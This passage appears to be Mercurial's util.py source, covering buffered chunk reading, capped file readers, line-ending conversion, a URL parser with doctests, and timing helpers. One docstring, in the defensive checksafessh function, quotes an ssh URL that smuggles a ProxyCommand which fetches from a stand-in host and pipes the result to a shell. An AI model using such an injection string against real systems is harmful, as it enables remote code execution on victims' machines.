2586 2586 pos = end
2587 2587 else:
2588 2588 yield chunk
2589 2589
2590 2590 self.iter = splitbig(in_iter)
2591 2591 self._queue = collections.deque()
2592 2592 self._chunkoffset = 0
2593 2593
2594 2594 def read(self, l=None):
2595 2595 """Read L bytes of data from the iterator of chunks of data.
2596 2596 Returns less than L bytes if the iterator runs dry.
2597 2597
2598 2598 If size parameter is omitted, read everything"""
2599 2599 if l is None:
2600 2600 return b''.join(self.iter)
2601 2601
2602 2602 left = l
2603 2603 buf = []
2604 2604 queue = self._queue
2605 2605 while left > 0:
2606 2606 # refill the queue
2607 2607 if not queue:
2608 2608 target = 2 ** 18
2609 2609 for chunk in self.iter:
2610 2610 queue.append(chunk)
2611 2611 target -= len(chunk)
2612 2612 if target <= 0:
2613 2613 break
2614 2614 if not queue:
2615 2615 break
2616 2616
2617 2617 # The easy way to do this would be to queue.popleft(), modify the
2618 2618 # chunk (if necessary), then queue.appendleft(). However, for cases
2619 2619 # where we read partial chunk content, this incurs 2 dequeue
2620 2620 # mutations and creates a new str for the remaining chunk in the
2621 2621 # queue. Our code below avoids this overhead.
2622 2622
2623 2623 chunk = queue[0]
2624 2624 chunkl = len(chunk)
2625 2625 offset = self._chunkoffset
2626 2626
2627 2627 # Use full chunk.
2628 2628 if offset == 0 and left >= chunkl:
2629 2629 left -= chunkl
2630 2630 queue.popleft()
2631 2631 buf.append(chunk)
2632 2632 # self._chunkoffset remains at 0.
2633 2633 continue
2634 2634
2635 2635 chunkremaining = chunkl - offset
2636 2636
2637 2637 # Use all of unconsumed part of chunk.
2638 2638 if left >= chunkremaining:
2639 2639 left -= chunkremaining
2640 2640 queue.popleft()
2641 2641 # offset == 0 is enabled by block above, so this won't merely
2642 2642 # copy via ``chunk[0:]``.
2643 2643 buf.append(chunk[offset:])
2644 2644 self._chunkoffset = 0
2645 2645
2646 2646 # Partial chunk needed.
2647 2647 else:
2648 2648 buf.append(chunk[offset : offset + left])
2649 2649 self._chunkoffset += left
2650 2650 left -= chunkremaining
2651 2651
2652 2652 return b''.join(buf)
2653 2653
2654 2654
2655 2655 def filechunkiter(f, size=131072, limit=None):
2656 2656 """Create a generator that produces the data in the file size
2657 2657 (default 131072) bytes at a time, up to optional limit (default is
2658 2658 to read all data). Chunks may be less than size bytes if the
2659 2659 chunk is the last chunk in the file, or the file is a socket or
2660 2660 some other type of file that sometimes reads less data than is
2661 2661 requested."""
2662 2662 assert size >= 0
2663 2663 assert limit is None or limit >= 0
2664 2664 while True:
2665 2665 if limit is None:
2666 2666 nbytes = size
2667 2667 else:
2668 2668 nbytes = min(limit, size)
2669 2669 s = nbytes and f.read(nbytes)
2670 2670 if not s:
2671 2671 break
2672 2672 if limit:
2673 2673 limit -= len(s)
2674 2674 yield s
2675 2675
2676 2676
2677 2677 class cappedreader(object):
2678 2678 """A file object proxy that allows reading up to N bytes.
2679 2679
2680 2680 Given a source file object, instances of this type allow reading up to
2681 2681 N bytes from that source file object. Attempts to read past the allowed
2682 2682 limit are treated as EOF.
2683 2683
2684 2684 It is assumed that I/O is not performed on the original file object
2685 2685 in addition to I/O that is performed by this instance. If there is,
2686 2686 state tracking will get out of sync and unexpected results will ensue.
2687 2687 """
2688 2688
2689 2689 def __init__(self, fh, limit):
2690 2690 """Allow reading up to <limit> bytes from <fh>."""
2691 2691 self._fh = fh
2692 2692 self._left = limit
2693 2693
2694 2694 def read(self, n=-1):
2695 2695 if not self._left:
2696 2696 return b''
2697 2697
2698 2698 if n < 0:
2699 2699 n = self._left
2700 2700
2701 2701 data = self._fh.read(min(n, self._left))
2702 2702 self._left -= len(data)
2703 2703 assert self._left >= 0
2704 2704
2705 2705 return data
2706 2706
2707 2707 def readinto(self, b):
2708 2708 res = self.read(len(b))
2709 2709 if res is None:
2710 2710 return None
2711 2711
2712 2712 b[0 : len(res)] = res
2713 2713 return len(res)
2714 2714
2715 2715
2716 2716 def unitcountfn(*unittable):
2717 2717 '''return a function that renders a readable count of some quantity'''
2718 2718
2719 2719 def go(count):
2720 2720 for multiplier, divisor, format in unittable:
2721 2721 if abs(count) >= divisor * multiplier:
2722 2722 return format % (count / float(divisor))
2723 2723 return unittable[-1][2] % count
2724 2724
2725 2725 return go
2726 2726
2727 2727
2728 2728 def processlinerange(fromline, toline):
2729 2729 """Check that linerange <fromline>:<toline> makes sense and return a
2730 2730 0-based range.
2731 2731
2732 2732 >>> processlinerange(10, 20)
2733 2733 (9, 20)
2734 2734 >>> processlinerange(2, 1)
2735 2735 Traceback (most recent call last):
2736 2736 ...
2737 2737 ParseError: line range must be positive
2738 2738 >>> processlinerange(0, 5)
2739 2739 Traceback (most recent call last):
2740 2740 ...
2741 2741 ParseError: fromline must be strictly positive
2742 2742 """
2743 2743 if toline - fromline < 0:
2744 2744 raise error.ParseError(_(b"line range must be positive"))
2745 2745 if fromline < 1:
2746 2746 raise error.ParseError(_(b"fromline must be strictly positive"))
2747 2747 return fromline - 1, toline
2748 2748
2749 2749
2750 2750 bytecount = unitcountfn(
2751 2751 (100, 1 << 30, _(b'%.0f GB')),
2752 2752 (10, 1 << 30, _(b'%.1f GB')),
2753 2753 (1, 1 << 30, _(b'%.2f GB')),
2754 2754 (100, 1 << 20, _(b'%.0f MB')),
2755 2755 (10, 1 << 20, _(b'%.1f MB')),
2756 2756 (1, 1 << 20, _(b'%.2f MB')),
2757 2757 (100, 1 << 10, _(b'%.0f KB')),
2758 2758 (10, 1 << 10, _(b'%.1f KB')),
2759 2759 (1, 1 << 10, _(b'%.2f KB')),
2760 2760 (1, 1, _(b'%.0f bytes')),
2761 2761 )
2762 2762
2763 2763
2764 2764 class transformingwriter(object):
2765 2765 """Writable file wrapper to transform data by function"""
2766 2766
2767 2767 def __init__(self, fp, encode):
2768 2768 self._fp = fp
2769 2769 self._encode = encode
2770 2770
2771 2771 def close(self):
2772 2772 self._fp.close()
2773 2773
2774 2774 def flush(self):
2775 2775 self._fp.flush()
2776 2776
2777 2777 def write(self, data):
2778 2778 return self._fp.write(self._encode(data))
2779 2779
2780 2780
2781 2781 # Matches a single EOL which can either be a CRLF where repeated CR
2782 2782 # are removed or a LF. We do not care about old Macintosh files, so a
2783 2783 # stray CR is an error.
2784 2784 _eolre = remod.compile(br'\r*\n')
2785 2785
2786 2786
2787 2787 def tolf(s):
2788 2788 return _eolre.sub(b'\n', s)
2789 2789
2790 2790
2791 2791 def tocrlf(s):
2792 2792 return _eolre.sub(b'\r\n', s)
2793 2793
2794 2794
2795 2795 def _crlfwriter(fp):
2796 2796 return transformingwriter(fp, tocrlf)
2797 2797
2798 2798
2799 2799 if pycompat.oslinesep == b'\r\n':
2800 2800 tonativeeol = tocrlf
2801 2801 fromnativeeol = tolf
2802 2802 nativeeolwriter = _crlfwriter
2803 2803 else:
2804 2804 tonativeeol = pycompat.identity
2805 2805 fromnativeeol = pycompat.identity
2806 2806 nativeeolwriter = pycompat.identity
2807 2807
2808 2808 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2809 2809 3,
2810 2810 0,
2811 2811 ):
2812 2812 # There is an issue in CPython that some IO methods do not handle EINTR
2813 2813 # correctly. The following table shows what CPython version (and functions)
2814 2814 # are affected (buggy: has the EINTR bug, okay: otherwise):
2815 2815 #
2816 2816 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2817 2817 # --------------------------------------------------
2818 2818 # fp.__iter__ | buggy | buggy | okay
2819 2819 # fp.read* | buggy | okay [1] | okay
2820 2820 #
2821 2821 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2822 2822 #
2823 2823 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2824 2824 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2825 2825 #
2826 2826 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2827 2827 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2828 2828 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2829 2829 # fp.__iter__ but not other fp.read* methods.
2830 2830 #
2831 2831 # On modern systems like Linux, the "read" syscall cannot be interrupted
2832 2832 # when reading "fast" files like on-disk files. So the EINTR issue only
2833 2833 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2834 2834 # files approximately as "fast" files and use the fast (unsafe) code path,
2835 2835 # to minimize the performance impact.
2836 2836 if sys.version_info >= (2, 7, 4):
2837 2837 # fp.readline deals with EINTR correctly, use it as a workaround.
2838 2838 def _safeiterfile(fp):
2839 2839 return iter(fp.readline, b'')
2840 2840
2841 2841 else:
2842 2842 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2843 2843 # note: this may block longer than necessary because of bufsize.
2844 2844 def _safeiterfile(fp, bufsize=4096):
2845 2845 fd = fp.fileno()
2846 2846 line = b''
2847 2847 while True:
2848 2848 try:
2849 2849 buf = os.read(fd, bufsize)
2850 2850 except OSError as ex:
2851 2851 # os.read only raises EINTR before any data is read
2852 2852 if ex.errno == errno.EINTR:
2853 2853 continue
2854 2854 else:
2855 2855 raise
2856 2856 line += buf
2857 2857 if b'\n' in buf:
2858 2858 splitted = line.splitlines(True)
2859 2859 line = b''
2860 2860 for l in splitted:
2861 2861 if l[-1] == b'\n':
2862 2862 yield l
2863 2863 else:
2864 2864 line = l
2865 2865 if not buf:
2866 2866 break
2867 2867 if line:
2868 2868 yield line
2869 2869
2870 2870 def iterfile(fp):
2871 2871 fastpath = True
2872 2872 if type(fp) is file:
2873 2873 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2874 2874 if fastpath:
2875 2875 return fp
2876 2876 else:
2877 2877 return _safeiterfile(fp)
2878 2878
2879 2879
2880 2880 else:
2881 2881 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2882 2882 def iterfile(fp):
2883 2883 return fp
2884 2884
2885 2885
2886 2886 def iterlines(iterator):
2887 2887 for chunk in iterator:
2888 2888 for line in chunk.splitlines():
2889 2889 yield line
2890 2890
2891 2891
2892 2892 def expandpath(path):
2893 2893 return os.path.expanduser(os.path.expandvars(path))
2894 2894
2895 2895
2896 2896 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2897 2897 """Return the result of interpolating items in the mapping into string s.
2898 2898
2899 2899 prefix is a single character string, or a two character string with
2900 2900 a backslash as the first character if the prefix needs to be escaped in
2901 2901 a regular expression.
2902 2902
2903 2903 fn is an optional function that will be applied to the replacement text
2904 2904 just before replacement.
2905 2905
2906 2906 escape_prefix is an optional flag that allows using doubled prefix for
2907 2907 its escaping.
2908 2908 """
2909 2909 fn = fn or (lambda s: s)
2910 2910 patterns = b'|'.join(mapping.keys())
2911 2911 if escape_prefix:
2912 2912 patterns += b'|' + prefix
2913 2913 if len(prefix) > 1:
2914 2914 prefix_char = prefix[1:]
2915 2915 else:
2916 2916 prefix_char = prefix
2917 2917 mapping[prefix_char] = prefix_char
2918 2918 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2919 2919 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2920 2920
2921 2921
2922 2922 def getport(port):
2923 2923 """Return the port for a given network service.
2924 2924
2925 2925 If port is an integer, it's returned as is. If it's a string, it's
2926 2926 looked up using socket.getservbyname(). If there's no matching
2927 2927 service, error.Abort is raised.
2928 2928 """
2929 2929 try:
2930 2930 return int(port)
2931 2931 except ValueError:
2932 2932 pass
2933 2933
2934 2934 try:
2935 2935 return socket.getservbyname(pycompat.sysstr(port))
2936 2936 except socket.error:
2937 2937 raise error.Abort(
2938 2938 _(b"no port number associated with service '%s'") % port
2939 2939 )
2940 2940
2941 2941
2942 2942 class url(object):
2943 2943 r"""Reliable URL parser.
2944 2944
2945 2945 This parses URLs and provides attributes for the following
2946 2946 components:
2947 2947
2948 2948 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2949 2949
2950 2950 Missing components are set to None. The only exception is
2951 2951 fragment, which is set to '' if present but empty.
2952 2952
2953 2953 If parsefragment is False, fragment is included in query. If
2954 2954 parsequery is False, query is included in path. If both are
2955 2955 False, both fragment and query are included in path.
2956 2956
2957 2957 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2958 2958
2959 2959 Note that for backward compatibility reasons, bundle URLs do not
2960 2960 take host names. That means 'bundle://../' has a path of '../'.
2961 2961
2962 2962 Examples:
2963 2963
2964 2964 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2965 2965 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2966 2966 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2967 2967 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2968 2968 >>> url(b'file:///home/joe/repo')
2969 2969 <url scheme: 'file', path: '/home/joe/repo'>
2970 2970 >>> url(b'file:///c:/temp/foo/')
2971 2971 <url scheme: 'file', path: 'c:/temp/foo/'>
2972 2972 >>> url(b'bundle:foo')
2973 2973 <url scheme: 'bundle', path: 'foo'>
2974 2974 >>> url(b'bundle://../foo')
2975 2975 <url scheme: 'bundle', path: '../foo'>
2976 2976 >>> url(br'c:\foo\bar')
2977 2977 <url path: 'c:\\foo\\bar'>
2978 2978 >>> url(br'\\blah\blah\blah')
2979 2979 <url path: '\\\\blah\\blah\\blah'>
2980 2980 >>> url(br'\\blah\blah\blah#baz')
2981 2981 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2982 2982 >>> url(br'file:///C:\users\me')
2983 2983 <url scheme: 'file', path: 'C:\\users\\me'>
2984 2984
2985 2985 Authentication credentials:
2986 2986
2987 2987 >>> url(b'ssh://joe:xyz@x/repo')
2988 2988 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2989 2989 >>> url(b'ssh://joe@x/repo')
2990 2990 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2991 2991
2992 2992 Query strings and fragments:
2993 2993
2994 2994 >>> url(b'http://host/a?b#c')
2995 2995 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2996 2996 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2997 2997 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2998 2998
2999 2999 Empty path:
3000 3000
3001 3001 >>> url(b'')
3002 3002 <url path: ''>
3003 3003 >>> url(b'#a')
3004 3004 <url path: '', fragment: 'a'>
3005 3005 >>> url(b'http://host/')
3006 3006 <url scheme: 'http', host: 'host', path: ''>
3007 3007 >>> url(b'http://host/#a')
3008 3008 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3009 3009
3010 3010 Only scheme:
3011 3011
3012 3012 >>> url(b'http:')
3013 3013 <url scheme: 'http'>
3014 3014 """
3015 3015
3016 3016 _safechars = b"!~*'()+"
3017 3017 _safepchars = b"/!~*'()+:\\"
3018 3018 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3019 3019
3020 3020 def __init__(self, path, parsequery=True, parsefragment=True):
3021 3021 # We slowly chomp away at path until we have only the path left
3022 3022 self.scheme = self.user = self.passwd = self.host = None
3023 3023 self.port = self.path = self.query = self.fragment = None
3024 3024 self._localpath = True
3025 3025 self._hostport = b''
3026 3026 self._origpath = path
3027 3027
3028 3028 if parsefragment and b'#' in path:
3029 3029 path, self.fragment = path.split(b'#', 1)
3030 3030
3031 3031 # special case for Windows drive letters and UNC paths
3032 3032 if hasdriveletter(path) or path.startswith(b'\\\\'):
3033 3033 self.path = path
3034 3034 return
3035 3035
3036 3036 # For compatibility reasons, we can't handle bundle paths as
3037 3037 # normal URLS
3038 3038 if path.startswith(b'bundle:'):
3039 3039 self.scheme = b'bundle'
3040 3040 path = path[7:]
3041 3041 if path.startswith(b'//'):
3042 3042 path = path[2:]
3043 3043 self.path = path
3044 3044 return
3045 3045
3046 3046 if self._matchscheme(path):
3047 3047 parts = path.split(b':', 1)
3048 3048 if parts[0]:
3049 3049 self.scheme, path = parts
3050 3050 self._localpath = False
3051 3051
3052 3052 if not path:
3053 3053 path = None
3054 3054 if self._localpath:
3055 3055 self.path = b''
3056 3056 return
3057 3057 else:
3058 3058 if self._localpath:
3059 3059 self.path = path
3060 3060 return
3061 3061
3062 3062 if parsequery and b'?' in path:
3063 3063 path, self.query = path.split(b'?', 1)
3064 3064 if not path:
3065 3065 path = None
3066 3066 if not self.query:
3067 3067 self.query = None
3068 3068
3069 3069 # // is required to specify a host/authority
3070 3070 if path and path.startswith(b'//'):
3071 3071 parts = path[2:].split(b'/', 1)
3072 3072 if len(parts) > 1:
3073 3073 self.host, path = parts
3074 3074 else:
3075 3075 self.host = parts[0]
3076 3076 path = None
3077 3077 if not self.host:
3078 3078 self.host = None
3079 3079 # path of file:///d is /d
3080 3080 # path of file:///d:/ is d:/, not /d:/
3081 3081 if path and not hasdriveletter(path):
3082 3082 path = b'/' + path
3083 3083
3084 3084 if self.host and b'@' in self.host:
3085 3085 self.user, self.host = self.host.rsplit(b'@', 1)
3086 3086 if b':' in self.user:
3087 3087 self.user, self.passwd = self.user.split(b':', 1)
3088 3088 if not self.host:
3089 3089 self.host = None
3090 3090
3091 3091 # Don't split on colons in IPv6 addresses without ports
3092 3092 if (
3093 3093 self.host
3094 3094 and b':' in self.host
3095 3095 and not (
3096 3096 self.host.startswith(b'[') and self.host.endswith(b']')
3097 3097 )
3098 3098 ):
3099 3099 self._hostport = self.host
3100 3100 self.host, self.port = self.host.rsplit(b':', 1)
3101 3101 if not self.host:
3102 3102 self.host = None
3103 3103
3104 3104 if (
3105 3105 self.host
3106 3106 and self.scheme == b'file'
3107 3107 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3108 3108 ):
3109 3109 raise error.Abort(
3110 3110 _(b'file:// URLs can only refer to localhost')
3111 3111 )
3112 3112
3113 3113 self.path = path
3114 3114
3115 3115 # leave the query string escaped
3116 3116 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3117 3117 v = getattr(self, a)
3118 3118 if v is not None:
3119 3119 setattr(self, a, urlreq.unquote(v))
3120 3120
3121 3121 @encoding.strmethod
3122 3122 def __repr__(self):
3123 3123 attrs = []
3124 3124 for a in (
3125 3125 b'scheme',
3126 3126 b'user',
3127 3127 b'passwd',
3128 3128 b'host',
3129 3129 b'port',
3130 3130 b'path',
3131 3131 b'query',
3132 3132 b'fragment',
3133 3133 ):
3134 3134 v = getattr(self, a)
3135 3135 if v is not None:
3136 3136 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3137 3137 return b'<url %s>' % b', '.join(attrs)
3138 3138
3139 3139 def __bytes__(self):
3140 3140 r"""Join the URL's components back into a URL string.
3141 3141
3142 3142 Examples:
3143 3143
3144 3144 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3145 3145 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3146 3146 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3147 3147 'http://user:pw@host:80/?foo=bar&baz=42'
3148 3148 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3149 3149 'http://user:pw@host:80/?foo=bar%3dbaz'
3150 3150 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3151 3151 'ssh://user:pw@[::1]:2200//home/joe#'
3152 3152 >>> bytes(url(b'http://localhost:80//'))
3153 3153 'http://localhost:80//'
3154 3154 >>> bytes(url(b'http://localhost:80/'))
3155 3155 'http://localhost:80/'
3156 3156 >>> bytes(url(b'http://localhost:80'))
3157 3157 'http://localhost:80/'
3158 3158 >>> bytes(url(b'bundle:foo'))
3159 3159 'bundle:foo'
3160 3160 >>> bytes(url(b'bundle://../foo'))
3161 3161 'bundle:../foo'
3162 3162 >>> bytes(url(b'path'))
3163 3163 'path'
3164 3164 >>> bytes(url(b'file:///tmp/foo/bar'))
3165 3165 'file:///tmp/foo/bar'
3166 3166 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3167 3167 'file:///c:/tmp/foo/bar'
3168 3168 >>> print(url(br'bundle:foo\bar'))
3169 3169 bundle:foo\bar
3170 3170 >>> print(url(br'file:///D:\data\hg'))
3171 3171 file:///D:\data\hg
3172 3172 """
3173 3173 if self._localpath:
3174 3174 s = self.path
3175 3175 if self.scheme == b'bundle':
3176 3176 s = b'bundle:' + s
3177 3177 if self.fragment:
3178 3178 s += b'#' + self.fragment
3179 3179 return s
3180 3180
3181 3181 s = self.scheme + b':'
3182 3182 if self.user or self.passwd or self.host:
3183 3183 s += b'//'
3184 3184 elif self.scheme and (
3185 3185 not self.path
3186 3186 or self.path.startswith(b'/')
3187 3187 or hasdriveletter(self.path)
3188 3188 ):
3189 3189 s += b'//'
3190 3190 if hasdriveletter(self.path):
3191 3191 s += b'/'
3192 3192 if self.user:
3193 3193 s += urlreq.quote(self.user, safe=self._safechars)
3194 3194 if self.passwd:
3195 3195 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3196 3196 if self.user or self.passwd:
3197 3197 s += b'@'
3198 3198 if self.host:
3199 3199 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3200 3200 s += urlreq.quote(self.host)
3201 3201 else:
3202 3202 s += self.host
3203 3203 if self.port:
3204 3204 s += b':' + urlreq.quote(self.port)
3205 3205 if self.host:
3206 3206 s += b'/'
3207 3207 if self.path:
3208 3208 # TODO: similar to the query string, we should not unescape the
3209 3209 # path when we store it, the path might contain '%2f' = '/',
3210 3210 # which we should *not* escape.
3211 3211 s += urlreq.quote(self.path, safe=self._safepchars)
3212 3212 if self.query:
3213 3213 # we store the query in escaped form.
3214 3214 s += b'?' + self.query
3215 3215 if self.fragment is not None:
3216 3216 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3217 3217 return s
3218 3218
3219 3219 __str__ = encoding.strmethod(__bytes__)
3220 3220
3221 3221 def authinfo(self):
3222 3222 user, passwd = self.user, self.passwd
3223 3223 try:
3224 3224 self.user, self.passwd = None, None
3225 3225 s = bytes(self)
3226 3226 finally:
3227 3227 self.user, self.passwd = user, passwd
3228 3228 if not self.user:
3229 3229 return (s, None)
3230 3230 # authinfo[1] is passed to urllib2 password manager, and its
3231 3231 # URIs must not contain credentials. The host is passed in the
3232 3232 # URIs list because Python < 2.4.3 uses only that to search for
3233 3233 # a password.
3234 3234 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3235 3235
3236 3236 def isabs(self):
3237 3237 if self.scheme and self.scheme != b'file':
3238 3238 return True # remote URL
3239 3239 if hasdriveletter(self.path):
3240 3240 return True # absolute for our purposes - can't be joined()
3241 3241 if self.path.startswith(br'\\'):
3242 3242 return True # Windows UNC path
3243 3243 if self.path.startswith(b'/'):
3244 3244 return True # POSIX-style
3245 3245 return False
3246 3246
3247 3247 def localpath(self):
3248 3248 if self.scheme == b'file' or self.scheme == b'bundle':
3249 3249 path = self.path or b'/'
3250 3250 # For Windows, we need to promote hosts containing drive
3251 3251 # letters to paths with drive letters.
3252 3252 if hasdriveletter(self._hostport):
3253 3253 path = self._hostport + b'/' + self.path
3254 3254 elif (
3255 3255 self.host is not None and self.path and not hasdriveletter(path)
3256 3256 ):
3257 3257 path = b'/' + path
3258 3258 return path
3259 3259 return self._origpath
3260 3260
3261 3261 def islocal(self):
3262 3262 '''whether localpath will return something that posixfile can open'''
3263 3263 return (
3264 3264 not self.scheme
3265 3265 or self.scheme == b'file'
3266 3266 or self.scheme == b'bundle'
3267 3267 )
3268 3268
3269 3269
3270 3270 def hasscheme(path):
3271 3271 return bool(url(path).scheme)
3272 3272
3273 3273
3274 3274 def hasdriveletter(path):
3275 3275 return path and path[1:2] == b':' and path[0:1].isalpha()
3276 3276
3277 3277
3278 3278 def urllocalpath(path):
3279 3279 return url(path, parsequery=False, parsefragment=False).localpath()
3280 3280
3281 3281
3282 3282 def checksafessh(path):
3283 3283 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3284 3284
3285 3285 This is a sanity check for ssh urls. ssh will parse the first item as
3286 3286 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3287 3287 Let's prevent these potentially exploited urls entirely and warn the
3288 3288 user.
3289 3289
3290 3290 Raises an error.Abort when the url is unsafe.
3291 3291 """
3292 3292 path = urlreq.unquote(path)
3293 3293 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3294 3294 raise error.Abort(
3295 3295 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3296 3296 )
3297 3297
3298 3298
3299 3299 def hidepassword(u):
3300 3300 '''hide user credential in a url string'''
3301 3301 u = url(u)
3302 3302 if u.passwd:
3303 3303 u.passwd = b'***'
3304 3304 return bytes(u)
3305 3305
3306 3306
3307 3307 def removeauth(u):
3308 3308 '''remove all authentication information from a url string'''
3309 3309 u = url(u)
3310 3310 u.user = u.passwd = None
3311 3311 return bytes(u)
3312 3312
3313 3313
3314 3314 timecount = unitcountfn(
3315 3315 (1, 1e3, _(b'%.0f s')),
3316 3316 (100, 1, _(b'%.1f s')),
3317 3317 (10, 1, _(b'%.2f s')),
3318 3318 (1, 1, _(b'%.3f s')),
3319 3319 (100, 0.001, _(b'%.1f ms')),
3320 3320 (10, 0.001, _(b'%.2f ms')),
3321 3321 (1, 0.001, _(b'%.3f ms')),
3322 3322 (100, 0.000001, _(b'%.1f us')),
3323 3323 (10, 0.000001, _(b'%.2f us')),
3324 3324 (1, 0.000001, _(b'%.3f us')),
3325 3325 (100, 0.000000001, _(b'%.1f ns')),
3326 3326 (10, 0.000000001, _(b'%.2f ns')),
3327 3327 (1, 0.000000001, _(b'%.3f ns')),
3328 3328 )
3329 3329
3330 3330
3331 3331 @attr.s
3332 3332 class timedcmstats(object):
3333 3333 """Stats information produced by the timedcm context manager on entering."""
3334 3334
3335 3335 # the starting value of the timer as a float (meaning and resulution is
3336 3336 # platform dependent, see util.timer)
3337 3337 start = attr.ib(default=attr.Factory(lambda: timer()))
3338 3338 # the number of seconds as a floating point value; starts at 0, updated when
3339 3339 # the context is exited.
3340 3340 elapsed = attr.ib(default=0)
3341 3341 # the number of nested timedcm context managers.
3342 3342 level = attr.ib(default=1)
3343 3343
3344 3344 def __bytes__(self):
3345 3345 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3346 3346
3347 3347 __str__ = encoding.strmethod(__bytes__)
3348 3348
3349 3349
3350 3350 @contextlib.contextmanager
3351 3351 def timedcm(whencefmt, *whenceargs):
3352 3352 """A context manager that produces timing information for a given context.
3353 3353
3354 3354 On entering a timedcmstats instance is produced.
3355 3355
3356 3356 This context manager is reentrant.
3357 3357
3358 3358 """
3359 3359 # track nested context managers
3360 3360 timedcm._nested += 1
3361 3361 timing_stats = timedcmstats(level=timedcm._nested)
3362 3362 try:
3363 3363 with tracing.log(whencefmt, *whenceargs):
3364 3364 yield timing_stats
3365 3365 finally:
3366 3366 timing_stats.elapsed = timer() - timing_stats.start
3367 3367 timedcm._nested -= 1
3368 3368
3369 3369
3370 3370 timedcm._nested = 0
3371 3371
3372 3372
3373 3373 def timed(func):
3374 3374 '''Report the execution time of a function call to stderr.
3375 3375
3376 3376 During development, use as a decorator when you need to measure
3377 3377 the cost of a function, e.g. as follows:
3378 3378
3379 3379 @util.timed
3380 3380 def foo(a, b, c):
3381 3381 pass
3382 3382 '''
3383 3383
3384 3384 def wrapper(*args, **kwargs):
3385 3385 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3386 3386 result = func(*args, **kwargs)
3387 3387 stderr = procutil.stderr
3388 3388 stderr.write(
3389 3389 b'%s%s: %s\n'
3390 3390 % (
3391 3391 b' ' * time_stats.level * 2,
3392 3392 pycompat.bytestr(func.__name__),
3393 3393 time_stats,
3394 3394 )
3395 3395 )
3396 3396 return result
3397 3397
3398 3398 return wrapper
3399 3399
3400 3400
3401 3401 _sizeunits = (
3402 3402 (b'm', 2 ** 20),
3403 3403 (b'k', 2 ** 10),
3404 3404 (b'g', 2 ** 30),
3405 3405 (b'kb', 2 ** 10),
3406 3406 (b'mb', 2 ** 20),
3407 3407 (b'gb', 2 ** 30),
3408 3408 (b'b', 1),
3409 3409 )
3410 3410
3411 3411
3412 3412 def sizetoint(s):
3413 3413 '''Convert a space specifier to a byte count.
3414 3414
3415 3415 >>> sizetoint(b'30')
3416 3416 30
3417 3417 >>> sizetoint(b'2.2kb')
3418 3418 2252
3419 3419 >>> sizetoint(b'6M')
3420 3420 6291456
3421 3421 '''
3422 3422 t = s.strip().lower()
3423 3423 try:
3424 3424 for k, u in _sizeunits:
3425 3425 if t.endswith(k):
3426 3426 return int(float(t[: -len(k)]) * u)
3427 3427 return int(t)
3428 3428 except ValueError:
3429 3429 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3430 3430
3431 3431
3432 3432 class hooks(object):
3433 3433 '''A collection of hook functions that can be used to extend a
3434 3434 function's behavior. Hooks are called in lexicographic order,
3435 3435 based on the names of their sources.'''
3436 3436
3437 3437 def __init__(self):
3438 3438 self._hooks = []
3439 3439
3440 3440 def add(self, source, hook):
3441 3441 self._hooks.append((source, hook))
3442 3442
3443 3443 def __call__(self, *args):
3444 3444 self._hooks.sort(key=lambda x: x[0])
3445 3445 results = []
3446 3446 for source, hook in self._hooks:
3447 3447 results.append(hook(*args))
3448 3448 return results
3449 3449
3450 3450
3451 3451 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3452 3452 '''Yields lines for a nicely formatted stacktrace.
3453 3453 Skips the 'skip' last entries, then return the last 'depth' entries.
3454 3454 Each file+linenumber is formatted according to fileline.
3455 3455 Each line is formatted according to line.
3456 3456 If line is None, it yields:
3457 3457 length of longest filepath+line number,
3458 3458 filepath+linenumber,
3459 3459 function
3460 3460
